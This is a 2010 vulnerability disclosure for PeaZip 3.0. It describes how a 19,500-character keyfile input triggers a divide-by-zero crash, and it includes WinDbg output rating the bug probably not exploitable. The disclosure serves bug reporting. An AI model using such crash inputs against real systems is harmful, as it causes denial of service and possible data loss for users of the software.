# Exploit Title: Peazip 3.0 DOS attack # Date: 30/03/2010 # Author: Richard leahy # Software Link: # Version: 3.0 # Tested on: Windows Xp Sp2 # Code : no code just print out the A's and paste them into the input box Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data. To trigger the vulnerability open up the application, click tools, enter password / keyfile. password: test confirm password: test keyfile:"A" * 19500 kind regards richard leahy (d80.8c): Integer divide-by-zero - code c0000094 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8 eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0x124ea2: 00524ea2 f7f9 idiv eax,ecx 0:000> !exploitable No export exploitable found 0:000> !load winext/msec.dll 0:000> !exploitable *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\USER32.dll - Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a) This is a divide by zero, and is probably not exploitable. ________________________________ Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>